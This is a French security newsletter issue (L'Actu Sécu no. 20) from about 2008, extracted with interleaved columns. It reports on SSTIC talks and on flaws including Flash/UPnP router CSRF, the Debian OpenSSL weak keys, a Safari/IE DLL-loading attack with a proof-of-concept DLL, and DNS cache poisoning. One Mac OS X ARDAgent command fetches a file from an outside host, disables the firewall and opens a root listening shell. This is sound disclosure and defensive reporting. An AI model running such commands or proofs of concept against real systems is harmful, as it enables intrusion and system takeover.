principale du site internet. Le cadre associ cette
frame est de 100%. Ainsi, seule cette dernire frame
sera visible par lutilisateur.

Les animations Flash utilises ont t codes en Flex
(langage propritaire dAdobe).
Voici le code source dune de ces animations:
Cependant, deux appels UPnP ont t effectus grce

aux animations flash charges discrtement.

LACTU SCU N20
Linterface dadministration du routeur ADSL de la Enfin, nos tests ont dmontr que certains routeurs
victime, indique que les ports demands ont bien t ADSL empchaient le NAT de port considr comme
ouverts dans la partie UPnP. dangereux : 138, 139 et 445. Un attaquant ne pourrait
alors pas visualiser les fichiers partags comme dans
notre exemple.
A linverse, certaines interfaces dadministration ne

proposent pas de visualiser les ports natts par le
service UPnP. Lattaque est alors indtectable, et un
utilisateur ne peut supprimer les ports natts par ce
service quen dveloppant un script envoyant des
requtes UPnP ...
Conclusion
Les animations Flash ont t jusqu prsent une

arme redoutable pour mener des attaques CSRF
Lattaquant peut alors visualiser les dossiers partags puisquelles permettent denvoyer des requtes
de sa victime depuis Internet ( condition quun partage HTTP sur un domaine tiers. Coupl lexploitation
soit activ). des faiblesses du protocole UPnP, ces dernires
savrent trs utiles et parfaites pour de telles
attaques.
Adobe vient tout juste de corriger cette faille.

Cependant, de nombreux internautes restent
encore vulnrables tant que leur version du lecteur
Flash ne sera pas jour.
C'est pourquoi nous vous recommandons de mettre

jour votre lecteur Flash, de dsactiver le service
UPnP sur tous vos routeurs si vous savez natter
vous mme vos ports via linterface
dadministration.
Webographie
Les routeurs ADSL franais
[1] ActuScu n11 : Les attaques CSRF
Sur les principaux routeurs ADSL franais, le service h t t p : / / w w w. x m c o p a r t n e r s . c o m / a c t u - s e c u /
UPnP est activ par dfaut mis part sur la Freebox qui actu_secu_fevrier2007.pdf
nimplmente pas ce service.
[2] Blog de Jeremiah Grossman sur ltude
Tous les routeurs sont donc vulnrables une attaque crossdomain.xml
CSRF cependant les fonctionnalits offertes par les http://jeremiahgrossman.blogspot.com/2008/05/
diffrents constructeurs franais restent limites. Seule crossdomainxml-invites-cross-site.html
la fonction de NAT de port reste la plus dangereuse.
L attaque que nous vous avons dcrite comporte

certaines limitations. En effet, chaque constructeur
implmente un ControlURL qui lui est propre. Un pirate
voulant raliser une attaque de grande envergure
devrait alors charger un fichier Flash envoyant de
nombreuses requtes (une pour chaque ControlURL
des diffrents constructeurs).
De plus, certains constructeurs attribuent un port
dynamique pour le serveur web lanc par UPnP,
modifi chaque dmarrage. Ce choix ne scurise pas
davantage le routeur (puisque le choix du port reste
toujours dans un espace rduit).

LACTU SCU N20
SSTIC
SSTIC
La sixime dition de la confrence

SSTIC (Symposium sur la Scurit
des Technologies de l'Information)
sest droule cette anne Rennes
du 4 au 6 juin. Elle rassemble la
fois des chercheurs, des
consultants, des institutionnels ou
mme des tudiants viennent
partager leurs travaux au sein de
multiples confrences. Ces
dernires couvrent les principaux
thmes de la scurit des systmes
dinformations: du social
engineering, de la virologie en
passant par des attaques
matrielles
Voici un petit rsum des

interventions qui nous ont le plus
marqus...
XMCO | Partners
Anatomie dun dsastre annonc Si le cycle de conception est dj termin et le projet

fonctionnel, il ne reste quune seule solution :
La SSTIC commena par une confrence tenue par lapplication de correctif pour tenter de corriger au
Marcus Ranum (Tenable Network Security). Ce dernier, mieux les erreurs
explique lorigine invitable des catastrophes
informatiques en essayant de les inscrire au sein dun Il dfinie des recommandations plus gnriques
processus classique. Concrtement, lorsquune ide comme viter les abus de langage: Scuris nest
est mauvaise, mais quelle provient de la haute pas la mme chose que relativement scuris bref
hirarchie, le manque dopposition et une coute ne pas cacher les risques potentiels.
approximative conduisent la ralisation de cette
mauvaise ide.
Lorsquune ide dangereuse est lance, elle ne sarrte
plus.
Marcus Ranum continue sa prsentation en dressant

un futur plutt pessimiste. Il met laccent sur lnorme
diffrence entre la perception de la scurit et ce qui
est rellement mis en place. Il insiste en expliquant
que ce foss ne va cesser de sagrandir dans les

annes venir.
Une remarque plutt pertinente de Marcus Ranum ft:

Lorsquune ide est mauvaise ds le dpart, peu
importe les solutions, correctifs, service pack ou autres,
elle restera toujours mauvaise.
Quelles sont les solutions envisageables pour lutter

contre ces dsastres?

LACTU SCU N20
Activation des cartes puce sans contact linsu Par exemple, imaginons le scnario dattaque
du porteur suivant:
Aprs une premire confrence gnraliste, Christophe Deux pirates: le premier proche de la victime active sa
Mourtel (Gemalto) nous propose une intervention plus carte son insu et transmet les informations son
technique sur lactivation des cartes puce via un acolyte. Le deuxime reoit les donnes et les
champ magntique. transmet la centrale de paiement.
Dans les annes venir, les cartes Bilan: la victime rgle une facture son insu.
sans contact pourront par exemple
remplacer les cartes de paiement
traditionnelles ou piste
magntique. MasterCard dveloppe
actuellement cette technologie avec
le nouveau systme de paiement
PayPass (en test aux tats-Unis).
Cependant, la scurit de ces nouveaux moyens de

paiement reste encore floue et une problmatique se
pose alors, comment empcher lactivation de ces
cartes linsu de son utilisateur...
En effet, dans le cas dune carte sans contact, la
communication peut stablir si cette dernire se situe
dans un primtre maximum de 30 cm. Les
problmes de scurit sont donc bel et bien prsents
puisquil est thoriquement possible de rcuprer des
donnes entre lmetteur et le rcepteur.
Aprs avoir rappel les principes de cette technologie

(frquence de fonctionnement, transmission de
donne...), Christophe Mourtel prsente les diffrents
types dattaque: passive ou active.
Les attaques dites passives permettent de rcuprer

des informations pendant un change autoris entre le
produit et un lecteur (sniffing). la diffrence de ces
dernires, les attaques dites actives ncessitent une
sollicitation de lattaquant sur le matriel vis linsu
de la victime. Lors de sa prsentation, lauteur a
dmontr de manire thorique, une attaque active de
type relai. 1. Activation et lecture de la carte
2. Relai des informations son complice
3. Rglement de la facture en utilisant la carte bleu de
la victime
Des mthodes existent pour lutter contre ces attaques,

par exemple crer une cage de Faraday autour de la

carte (protge des interfrences lectromagntiques)
dlivrable sous forme dun tui spcial, cependant une
telle solution oblige lutilisateur sortir sa carte (utilit
dune carte sans contact?!). Il serait possible de mettre
en place un bouton poussoir (capable dactiver le
champ magntique), dcrire physiquement un code
sur la carte qui servira de code daccs aux donnes
sensibles.
On regrettera labsence de dmonstration live...

LACTU SCU N20
L'expertise judiciaire des tlphones mobiles Bogues ou pigeages des processeurs :
quelles consquences sur la scurit?
Le march actuel sur les tlphones mobiles est
grandissant, de nouveaux venus comme Sony-Ericsson Cette prsentation thorique expliquait les
ou larrive du iPhone est en train de bouleverser les consquences scuritaires sur un systme
parts de march que se disputaient Nokia, Samsung, dexploitation qui fonctionnerait avec un processeur X86
Motorola Aujourdhui prs de 3 milliards de corrompu.
personnes utilisent des tlphones mobiles. lheure
actuelle, la perquisition du matriel hi-tech que ce soit Aprs avoir rappel les caractristiques dune
ordinateur, PDA, ou encore tlphones mobiles est architecture X86, Loc Duflot (DCSSI) explique qu
vital pour lavancement des enqutes judiciaires. partir dune application possdant des droits basiques,
il est possible dobtenir des privilges systmes en
David Naccache (Ecole Normale Suprieure) dresse un toute discrtion sur une machine dont le processeur est
panel des diffrentes donnes prsentes au sein dun backdoor.
tlphone, que ce soit des donnes utilisateurs
(photo, vido wap bookmarks ) ou des donnes
propres au mobile ou aux oprateurs. Lintervenant
explique ensuite les diffrentes mthodes pour
rcuprer les informations contenues sur le tlphone.
Un des problmes rside dans la connaissance du
code PIN de la carte SIM, ensuite il faut russir
analyser le contenu du tlphone afin den extraire les
diffrentes donnes. Cependant, pour accder ces
dernires il faut russir outrepasser le code pin.
Une mthode consiste demander gentiment le code

laccus, mais ces derniers souffrent souvent damnsie
Une autre solution consiste perquisitionner
loprateur et lui demander de communiquer le code
PUK la police (code utilis pour dbloquer le
tlphone aprs avoir saisi 3 reprises un mauvais
code PIN). Enfin, la dernire mthode consiste utiliser
des applets malicieuses. Lorsque le suspect sort de
sa garde vue, il rcupre son tlphone et le ractive.
On force alors ce dernier tlcharger lapplet via un
SMS MMS spcialement conu.
Le dernier moyen utilis rentre-t-il vraiment dans un

cadre lgal?
Les autorits ont-elles le droit de backdoorer un
suspect, quels sont les limites et le cadre des coutes?
Un exemple de pigeage de processeur rside dans la

modification de linstruction SALC qui permet
normalement de modifier la valeur du registre. Aprs
modification de cette instruction, un processus
classique peut obtenir des privilges maximums.
Cependant, cette attaque ne fonctionne que dans

certaines configurations de gestion de mmoire.
Les solutions permettant de se protger contre un

pigeage matriel sont:

Rduire le nombre dapplications qui sexcute
sur le systme.

Supprimer les logiciels de compilation.
Cette prsentation est claire et prcise, cependant, il

est dommage que cette dernire se base uniquement
sur lhypothse dun processeur pig, mais
actuellement en existe-t-il vraiment?

LACTU SCU N20
Autopsie et observation in vivo dun banker * Si oui, le injector server injecte au sein de la
page web lgitime, un formulaire malicieux. Ce
La confrence suivante prsente les spcificits dernier au sein demande des informations
techniques du malware nomm Anserin/Torpig ; confidentielles la victime.
l'ennemi numro un des banques en ligne. Nos chers
collgues Frdric Charpentier et Yannick Hamon ont
suivi pendant une anne lvolution de ce banker
capable de djouer les claviers virtuels et les autres
protections anti-keylogging.
Ce virus a pour principal objectif de voler tous les mots
de passe saisis sur la machine de la victime (comptes
bancaires, messagerie, site de jeux en ligne), mais il
est surtout redoutable pour subtiliser les identifiants
bancaires.
Pour cela, ce virus dvelopp par de vrais

professionnels possde des fonctionnalits volues
dinjection de faux formulaire lors de la visite des plus
grandes banques mondiales (il gre plus de 500 Formulaire dauthentification dune banque
banques diffrentes). Ce dernier sattache Internet
Explorer et remplace les vritables formulaires
dauthentification par un formulaire identique, mais qui
demande des informations sensibles (numro de carte,
date dexpiration, CVV2).
La communication du malware avec les pirates

seffectue grce deux serveurs distincts dont leurs
rles sont clairement dfini. Le premier nomm
Collector serveur va permettre de rcuprer et de
stocker toutes les informations voles, il distribue
galement les mises jour du malware. Le deuxime
serveur (optionnel) nomm injector serveur va
permettre de distribuer de fausses pages
Formulaire inject par Anserin lors de lauthentification sur la
dauthentifications relatives aux banques attaques.
banque en ligne
Un internaute imprudent saisit ses informations

sensibles (numro de carte bleue, CVV2) qui sont
ensuite envoyes au collector server.
Le dveloppement de ce malware a mme t conu

pour rsister la fermeture ventuelle des serveurs.
Une des techniques rside dans la transmission de
ladresse IP de linjector server lors des diverses
mises jour. La seconde repose sur la gnration
pseudo-alatoire du nom de domaine du Collector
Server. Ainsi, le malware peut reprendre contact avec
son serveur matre tout moment.
Nos collgues ont monitor pendant plusieurs mois le

fonctionnement de ce malware par lintermdiaire de
scripts en contournant, chaque fois, les backlists
mises en place par les pirates.
Enfin pour conclure cette prsentation, nos

consultants ont soumis des ides afin de lutter contre
Concrtement, comment ce malware agit-il? ce genre de malware : implmentation dune
* Un internaute souhaite se logguer sur la banque authentification double canal (demander une
* le virus consulte le injector server pour savoir sil confirmation au client via lenvoi dun SMS),
possde une fausse page didentification relative la bannissement des adresses IP par le Fai?
banque demande

LACTU SCU N20
SinFP, unification de la prise d'empreinte active et mthode fournie de trs bon rsultat, mais
passive des systmes d'exploitation demande de bonnes connaissances et la seconde
dite dynamique: on excute le malware et on observe
Patrice Auffret (Thomson) dcrit les limitations des ses actions.
diffrents outils de fingerprinting du march (permets de Dans la seconde mthode, on a donc deux postes, un
dterminer quel type de systme dexploitation est observateur qui coute le trafic, qui mule diffrents
utilis ) comme nmap, p0f avant dexpliquer les services (DNS, SMTP, HTTP) en enregistrant toutes
amliorations et les techniques utilises par SinFPCe les actions du code malveillant. Le deuxime ordinateur
logiciel a t conu afin de dterminer dans les pires contient donc le malware qui est excut, et possde
conditions possible (un seul port ouvert, filtrage ) le une configuration permettant de diriger nimporte quel
systme dexploitation utilis sur la machine distante. flux vers la machine dobservation.
Aprs avoir rappel les deux grands modes utiliss :

actif (Envoi de requtes afin de provoquer des
rponses) et passif (sniffing), lintervenant dveloppe le
fonctionnement de SinFP. En effet, cet outil utilis en
mode actif envoie au maximum trois paquets sur le
MEME port TCP ouvert contrairement nmap qui scan
lensemble des ports TCP. Cette caractristique rduit
les probabilits dtre dtect par un IDS. Les
diffrentes requtes envoyes sont un paquet TCP
SYN sans option TCP, un paquet TCP SYN avec de
nombreuses options TCP et un paquet TCP SYN ACK.
Cette mthode permet dobtenir une signature de faon

On peut ensuite comparer les bases de registres,
simple et fonctionnelle. En utilisant des masques de
tudier les logs
dformations pour adapter sa vision de la signature au
cas pratique dans lequel il est utilis et pouvoir identifier
La prsentation de Philippe LAGADEC (NATO / NC3A)
avec la plus grande probabilit le systme
fournit les bases pour llaboration dun laboratoire
dexploitation.
danalyse dynamique de codes malveillants.
La capture suivante illustre le rsultat dun scan SinFP.
P1,P2,P3 correspondent aux 3 paquets envoys. Les
Les rump sessions
15 chiffres associs chaque paquet correspondent
la signature de lOS interprte par SinFP.
Concernant les rump sessions, une bonne vingtaine
ont eu lieu. Le dpartement R&D de FT a prsent un
outil de conception qui permet de retrouver une cl
SSH vulnrable en moins de 5 minutes et
accessoirement de dchiffrer les communications SSH
Rsultat dun scan avec SinFP captures dans des paquets pcap.
LESL expose une technique pour ralise des blind
En se basant sur les trois signatures obtenues (et avec injection SQL en utilisant des retardateurs pour
utilisation dun masque de dformation), le scanner est lexcution des requtes Des sessions plus lgres
alors en mesure de donner le systme dexploitation de avec Nikoteen qui dmontre que lorsquon a une ide
la machine cible. en tte, il est difficile de passer outre, preuve lappui
avec la chanson "Still Loving You" de et le passage o
on *peut* entendre "ce soir j'ai les pieds qui puent" en
Dynamic malwares analysis for dummies lieu et place de "[...] so strong that I can't get through ".
Enfin, Cdric Blancher a fait trembler le MINEFI et
La dernire confrence de la SSTIC explique comment lassemble en faisant croire que les certificats dlivrs
tudier le comportement dun malware sous Windows par le ministre taient vulnrables la faille OpenSSL
de faon simple. Connatre le comportement dun code (voir article suivant).
malveillant est utile et peut fournir de nombreux
renseignements. En effet, on peut obtenir des Webographie
informations sur la source de lattaque, dterminer les
fonctionnalits du malware (virus, cheval de Troie,
[1] Site officiel de la SSTIC
keylogger...), les modifications engendres sur le
http://www.sstic.org/SSTIC08/info.do
systme, connaitre les machines vulnrables
[2] Blog de Cdric Blancher :
Il existe deux types danalyse lune dite statiques :
http://sid.rstack.org/blog/
dsassemblage du code et analyse de ce dernier, cette
LACTU SCU N20
LES MENACES DU MOIS

Tendance de lactivit malicieuse
dInternet :
Petit tour dhorizon des failles de

scurit, prsentes par les
consultants en charger de notre
service de veille....
XMCO | Partners
Depuis fin Mai, plusieurs vulnrabilits majeures ont t dcouvertes. Ces dernires ont aussi bien touch des
failles de logiciels utiliss sur des postes client comme sur des serveurs.
Les deux vulnrabilits majeures ont affect des problmes dentropie dans OpenSSL et dans BIND (DNS).
La presse comme les chercheurs en scurit se sont particulirement intresss ces deux problmes
majeurs. Le second dont peu dinformations ont t publies sera dailleurs dtaill lors de la confrence
BlackHat.
Nous dtaillerons galement deux problmes critiques qui ont affect Mac OS X (lvation de privilges ) et le
couple Safari/Internet Explorer (compromission dun systme)...bref des failles de scurit comme on les aime!
Enfin, nous prsenterons galement deux virus qui ont, sans doute, agac plus dun de nos lecteurs...

LACTU SCU N20
La faille OpenSSL de Debian
Vulnrabilits En consquence, toutes les cls SSL et SSH gnres

OpenSSL sous Debian depuis une machine Linux Debian et Ubuntu doivent
tre rgnres.
La vulnrabilit qui a fait le plus couler dencre ces
derniers temps concerne OpenSSL implment sur les
distributions Debian et Ubuntu.
Une faille de scurit critique a t mise en vidence au

mois de Mai 2008 et cette dernire concerne toutes les
clefs et les certificats gnrs depuis un systme
Debian durant les deux dernires annes...aie.
Revenons sur ce problme qui doit, encore lheure

actuelle, affoler les RSSI et les administrateurs UNIX.Si
vous navez jamais entendu parler de ce problme
majeur, lisez en dtail cet article et planifiez ds
prsent une runion de crise avec vos
administrateurs...
Lhistoire commence il y a deux ans. A la suite dune

plainte d'un diteur qui avait des problmes de
compatibilit avec la version d'OpenSSL, un
dveloppeur Debian pensant corriger le problme en
question a introduit, par mgarde (on lespre), un bug
au sein dOpenSSL.
En effet, les quelques lignes de code modifies ont, Les certificats sont galement concerns: ils doivent
pour faire simple, supprim le facteur alatoire tre rvoqus, rgnrs et resigns par l'Authorit de
ncessaire la gnration des clefs publiques/prives. Certification. Ces oprations doivent videmment tre
ralises suite la mise jour de OpenSSL.
Cette faille, de type cryptographique, provient du
gnrateur de nombres pseudo-alatoires (PRNG) de Deux types d'attaques sont possibles: le dchiffrement
OpenSSL utilis pour crer les cls publiques et de trames captures ou le contournement des
prives. La graine d'ala tait gale au PID (identifiant mcanismes d'authentification par cls.
En consquences, toutes les clefs SSL et SSH

du processsus) en cours d'utilisation. Sur un systme
Linux (plateforme x86), seules 2^15 (32768) valeurs
sont possibles. Le facteur alatoire est donc
considrablement compromis. gnres depuis deux ans sur une machine
Linux Debian et Ubuntu doivent tre
rgnres
Ainsi les serveurs SSH autorisant ce type

d'authentification sont potentiellement vulnrables
quelque soit leur systme d'exploitation (Unix, BSD,
Linux...). En effet, si le serveur autorise un utilisateur
s'authentifier l'aide d'une cl publique et que les cls
de l'utilisateur ont t gnres depuis un systme
Debian/Ubuntu vulnrable, un pirate peut bruteforcer
Cette faille est apparue en Septembre 2006 et ft cette authentification en un maximum de 32768
corrige le 13 Mai 2008. Ainsi, toutes les applications tentatives. L'attaquant doit tout de mme connatre le
utilisant la fonctionnalit PRNG de OpenSSL des login associ cette authentification, par exemple root.
distributions Debian et Ubuntu sont donc vulnrables.

LACTU SCU N20
Le nombre de tentatives peut tre considrablement
rduit en prenant compte du fait qu'un systme Debian/
Ubuntu incrmente squentiellement la valeur des PID.
Les valeurs des PID utilises pour la gnration de cls

d'utilisateurs SSH ont de trs grandes chances d'tre
comprises entre 500 et 10000, soit 9500 possibilits.
Automatisation de lattaque
Rfrence :
http://metasploit.com/users/hdm/tools/debian-openssl/
INFO...
Tor galement vulnrable
Quelques semaines aprs la dcouverte de

la faille OpenSSL, d'autres applications
utilisant la version vulnrable
d'OpenSSL refont parler d'elles.
La dernire en date n'est autre que le
rseau Tor permettant d'anonymiser le
trafic sur Internet (voir [1] ActuScu n
19). En effet, prs de 300 relais sur
Liste des 32768 clefs gnres les 1500/2000 relais disponibles (soit
prs de 1/6) implmenteraient une
Plusieurs outils ont t publis pour gnrer toutes les version d'OpenSSL dfectueuse.
cls possibles en fonction de l'algorithme (DSA/RSA) et
la taille de la cl. Le site "metasploit.com" propose Les consquences sont alors importantes.
Si les derniers noeuds d'un circuit Tor
galement en tlchargement les archives suivantes :
implmentent des clefs faibles, les
donnes transitant par ces noeuds
- SSH 1024-bit DSA Keys x86 (30.0M) pourraient alors tre dchiffres par un
- SSH 1023-bit RSA Keys x86 (25.0M) des propritaires de ces noeuds.
- SSH 1024-bit RSA Keys x86 (26.0M)
- SSH 8192-bit RSA Keys x86 (PID 1 4100+) (29.0M)
Une simple boucle excutant la commande "ssh

root@server -i <clef tester>" permettrait un pirate

de prendre le contrle des serveurs vulnrables
implmentant l'authentification par clef. Une telle
attaque serait donc bruyante (minimum de 9500
tentatives de connexions) mais pourrait tre ralise si
aucun mcanisme de bannissement d'IP n'tait mis en
place ou si les administrateurs n'taient pas vigilants.
Les captures suivantes illustrent lexploitation de cette

vulnrabilit. Nous avons dvelopper un script capable
dautomatiser lattaque. En 20 minutes, nous avons pu
identifier la clef de notre serveur...

LACTU SCU N20
Safari et Internet Explorer :

quand Microsoft rencontre Apple...
Prise de contrle dun systme via IE et Safari Suite la publication de Microsoft [3] alertant sur une
possible excution de code avec Safari, un internaute
Continuons la srie des vulnrabilits critiques de ce publie, le 10 juin, une preuve de concept (dj publi
mois. Aprs Debian, ce fut au tour dInternet Explorer en dcembre 2006) permettant d'exploiter la
dtre de nouveau montr du doigt. vulnrabilit d'Internet Explorer.
En effet, un problme de scurit identifi dans Safari L'attaque est donc aujourd'hui pleinement exploitable
pour Windows mais connu depuis quelques mois a sur un systme implmentant les deux navigateurs et
refait parler de lui la suite de la publication d'un vieil pourrait avoir des consquences dramatiques...
exploit pour Internet Explorer.
Le scnario d'attaque est simple.
Ce premier problme, dont lattaque drive a t En utilisant une balise iframe sur une page contrle
baptise "Carpet Bomb", concerne Safari. par le pirate, ce dernier peut forcer un utilisateur
Le chercheur Nitesh Dhanjani (connu galement pour naviguant avec Safari, tlcharger sur son bureau,
sa rcente intervention la Blackhat) a, depuis une librairie DLL malicieuse (schannel.dll).
plusieurs semaines, mis en garde les utilisateurs du
navigateur d'Apple [1]. En effet, le tlchargement de
fichiers non interprtables par le navigateur (dll,
excutables, fichiers compresss), est ralis de
manire automatique sous Safari. Ainsi, lorsquun
utilisateur clique sur un lien de tlchargement, Safari
lenregistre automatiquement sur le bureau de
lutilisateur sans aucune confirmation pralable Code de la page web malicieuse
(contrairement aux autres navigateurs).
Ce problme de scurit ne constitue pas une faille

de scurit part entire, cependant couple une
seconde vulnrabilit, cette attaque pourrait s'avrer
dramatique...
Lutilisation conjointe de Safari et dInternet

Explorer permet un pirate de prendre le
contrle dun systme en incitant sa victime
visiter une page web malicieuse...
Quelques jours plus tard, on retrouvait un commentaire
[2] prcisant qu'une vulnrabilit dcouverte dans
Internet Explorer deux ans auparavant, mais jamais
corrige serait adapte lexploitation de l'attaque
dcrite par M.Dhanjani.
Ce second problme, li Internet Explorer permet

dexcuter automatiquement certaines librairies
(sqmapi.dll, imageres.dll et schannel.dll) stockes sur le
Bureau lors du lancement du navigateur.

LACTU SCU N20
Lors de la prochaine excution d'Internet Explorer, le De son ct, Apple a pris note de la remarque de M.
navigateur va automatiquement charger et excuter le Dhanjani et a jug ce problme de la manire
code contenu dans la librairie malicieuse. suivante :
...the ability to have a preference to "Ask me before

downloading anything" is a good suggestion. We
can file that as an enhancement request for the
Safari team. Please note that we are not treating
this as a security issue, but a further measure to
raise the bar against unwanted downloads...
En attendant les correctifs adquats, nous vous

conseillons de ne pas utiliser conjointement Safari et
Internet Explorer et de ne jamais tlcharger de fichiers
DLL lors de vos navigations avec Internet Explorer.
Rfrences :
Exemple dun code dune libraire DLL malicieuse
[1] http://www.oreillynet.com/onlamp/blog/2008/05/
safari_carpet_bomb.html
Le code ci-dessous, compil sous le nom "schannel.dll" [ 2 ] h t t p : / / a v i v. r a f f o n . n e t / 2 0 0 8 / 0 5 / 3 1 /
permet de lancer la calculatrice de Windows. SafariPwnsInternetExplorer.aspx
[3] http://www.microsoft.com/technet/security/advisory/
953818.mspx
CODE
#include<windows.h>
BOOL WINAPI DllMain(
HINSTANCE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved
)
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
TCHAR windir[_MAX_PATH];
TCHAR cmd[ _MAX_PATH ];
GetEnvironmentVariable("WINDIR",windir,_MA
X_PATH );
wsprintf(cmd,"%s\\system32\
\calc.exe",windir);
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
ZeroMemory(,sizeof(pi));
CreateProcess(NULL,cmd,NULL,NULL,FALSE,
0,NULL,NULL,&si,);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return TRUE;
}
Ces vulnrabilits pourraient donc tre l'origine de

nombreuses attaques, car Microsoft n'a toujours pas
corrig ce problme.

LACTU SCU N20
Comment devenir root sur un Mac OS X
lvation de privilges sous Mac OS X
La socit Intego vient de dcouvrir une vulnrabilit

importante au sein des systmes dexploitation dApple Excution dune commande avec des droits root
Mac OS X 10.4 (Tiger) et Mac OS X 10.5 (Lopard) [1].
La capture prcdente illustre lexploitation de la
La vulnrabilit dcouverte permet un utilisateur vulnrabilit. Aucun outil nest utilis. Lutilisation dun
malveillant dobtenir des privilges administrateur logiciel dexcution dApple Script (natif) avec les
(root).Le problme est li une erreur de permissions, paramtres appropris permet ici dexcuter la
prsente au sein de ARDAgent, lapplication permettant commande whoami (quel utilisateur suis-je) avec les
de prendre le contrle d'une machine via Apple Remote permissions root.
Management).
Lexcution dune simple commande shell

Il est donc possible avec une commande judicieuse
dobtenir un accs distant root sur un systme Mac
OS X! La commande suivante permet de tlcharger et
permet un pirate dobtenir un shell distant en de charger un fichier de configuration, de dsactiver le
tant quutilisateur root pare-feu et enfin de lancer un shell en coute sur un
port dsir...
Cette application possde des permissions spciales :
le setuid bit. Le setuid indique au systme que
lexcution du programme devra tre faite avec les xxxscript -e 'tell app "ARDAgent" to do
shell script "cd /System/Library/
droits de propritaire du programme plutt quavec les
LaunchDaemons ; curl -o bash.plist http://
droits de lutilisateur courant. Le programme ARDAgent cdslash.net/temp/bash.plist
appartient au super-utilisateur root. Ainsi, lors de [cdslash.net] ; chmod 600 bash.plist ;
l'excution du programme, celui-ci dtient les launchctl load bash.plist ; launchctl
permissions root sans avoir saisir le mot de passe de start com.apple.bash ; ipfw disable
ce compte. firewall; launchctl "'
Les chercheurs de la socit Intego ont dmontr le

moyen de lancer des scripts "AppleScript" travers Aucun correctif nest actuellement disponible.
ARDAgent. Ainsi, il est possible d'excuter n'importe Cependant, plusieurs protections existent:
quelle commande avec les privilges du compte root
sans connatre le mot de passe. La premire consiste activer le service "Gestion
distance" (Remote Management) partir du menu
La commande en question a dj t diffuse sur Partage des Prfrences Systme. Il est bien sr
plusieurs forums. conseill de dsactiver toutes les options afin dviter
dexposer sa machine ladministration distante
Commande : comme le montre la capture suivante:
#xxxscript -e 'tell app "ARDAgent" to do

shell script "<commande>"'
Exemple :
#xxxscript -e 'tell app "ARDAgent" to do

shell script "whoami"'
root
Dsactivation de la Gestion Distance

LACTU SCU N20
La commande nest alors plus excute
Il est galement possible de supprimer lapplication

ARDAgent.app prsente au sein du rpertoire /
System/Library/CoreServices/RemoteManagement
Enfin, vous pouvez modifier les droits de lexcutable
en question avec la commande suivante :
sudo chmod -R u-s /System/Library/

CoreServices/RemoteManagement/ARDAgent.app
Cependant, lexcution de cette commande pourrait

avoir des consquences (dsactivation des mises
jour).
En conclusion, la scurit dApple Mac OS est la mme

que celle de tout systme Unix. Les failles setuid ont
toujours exist sur les systmes Unix, Mac OS X ne
passera donc pas ct.
Rfrences:
[1] http://www.intego.com/news/ism0802.asp
[2]http://www.securemac.com/applescript-tht-trojan-
horse.php

LACTU SCU N20
Faille DNS : Internet tait-il mena ?

d'Internet et d'tre en mesure de rediriger des millions
d'utilisateurs vers des sites malveillants.
La faille du protocole DNS Exploitation facilite dune faille connue
Aprs une alerte majeure de lInternet Systems Daprs les premires informations publies, cette faille
Consortium (ISC) sous le titre ANYONE RUNNING ne semble pas tre nouvelle ! Il s'agit d'une faille de
BIND AS A CACHING RESOLVER IS AFFECTED, les scurit inhrente au protocole DNS, connue depuis
principaux diteurs (Microsoft, Sun, Cisco, IBM) ont des annes. La nouveaut rside priori dans une
publi un correctif sur le logiciel BIND, le moteur DNS le nouvelle mthode d'exploitation qui permettrait de
plus rpandu sur Internet. corrompre efficacement et durablement le cache
des serveurs DNS. Jusqu'alors, les attaques de DNS
En quelques heures, cette alerte a dferl dans les Cache-Poisonning ne pouvaient fonctionner que sur un
mdias et a t diffuse par lAFP: tout a t dit et crit laps de temps rduit.
dessus...
Les hypothses que nous mettons dans la suite de cet
article seront confirmes ou infirmes les semaines
prochaines...
Risque?
Un pirate serait en mesure de changer malicieusement

l'adresse IP d'un serveur connu dans un serveur
DNS public. Ds lors, tous les utilisateurs de ce serveur
DNS seraient dups et redirigs vers la fausse adresse
IP. Ce type d'attaque consiste corrompre un serveur
DNS pour qu'il redirige ses utilisateurs vers des sites
malicieux (man-in-the-middle, faux sites, etc).
Lorsque l'on sait que le systme DNS est la base de

l'Internet, il est possible d'imaginer une attaque o plus
personne ne serait sr de visiter un vrai site web. La
consquence aurait pu tre une sorte d'attaque de
phishing globalise
Principe de lattaque
L'attaque peut tre ralise lorsqu'un serveur DNS ne

connait pas l'URL demande par un internaute et
interroge donc un autre serveur DNS au-dessus de lui
dans la hirarchie DNS.
Pour bien comprendre l'attaque, il faut imaginer le

scnario suivant :
Revenons donc en dtail sur cette alerte de scurit qui T0, Serveur A demande un Serveur B : "Connais-tu
a secou les diteurs et a fait beaucoup crire... l'adresse IP de cette URL l car je ne la connais pas ?"
T0+n, Serveur Pirate : "Oui, la voici : adresse-IP
Lalerte est due une vulnrabilit appele 'DNS usurpe".
Cache Poisonning' quun chercheur en scurit T0+N, Serveur B : "Oui, la voici : vritable adresse IP".
informatique, Dan Kaminsky, sapprte prsenter T0+x : Serveur A "Merci, j'enregistre cette rponse pour
lors de la confrence BlackHat Las Vegas. ne plus te la demander l'avenir".
Cette vulnrabilit permettait un attaquant de Le pirate rpond avant que le vrai serveur DNS ait eu
corrompre l'intgrit d'un ou plusieurs serveurs DNS. le temps de rpondre.

LACTU SCU N20
Pour que cette attaque fonctionne, il faut : Scnario d'attaque avec Google
1 - n<N pour que l'attaque fonctionne.

2 - Que le serveur A sache effectuer des requtes
rcursives, c'est--dire demander un autre
serveur la rponse.
3 - Que le serveur pirate usurpe l'identit du
serveur B lors de l'envoi de la fausse rponse.
Le protocole DNS est bas sur le protocole UDP.

UDP est un protocole non fiable, car "non
connect". Le protocole UDP peut alors tre
"spoof", c'est--dire que n'importe qui sur Internet
peut envoyer des paquets UDP en usurpant
l'adresse IP source d'un autre serveur ; et donc
dans le cas prsent d'un serveur DNS.
Dans notre exemple, le serveur Pirate envoie une

fausse rponse forge en se faisant passer pour le
serveur DNS B. La seule scurit propose par le
protocole DNS afin de garantir lintgrit dune
rponse DNS repose sur lidentifiant (ID) envoy avec " " " " " " " "
la question initiale. Ainsi, pour accepter la rponse de B
ou du serveur Pirate, le serveur A envoi un numro ID 1 - Linternaute demande au serveur DNS de son
alatoire avec sa question et attend cet ID dans la Fournisseur dAccs Internet ladresse IP de
rponse. www.google.fr.
La faille est trs prcisment ici. L'algorithme utilis 2 - Le serveur du FAI ne connait pas la rponse et
pour gnrer les identifiants des requtes DNS utilise dcide de faire une requte rcursive au serveur DNS
un espace de recherche trop restreint. De plus, les ayant autorit (soit le DNS de Google).
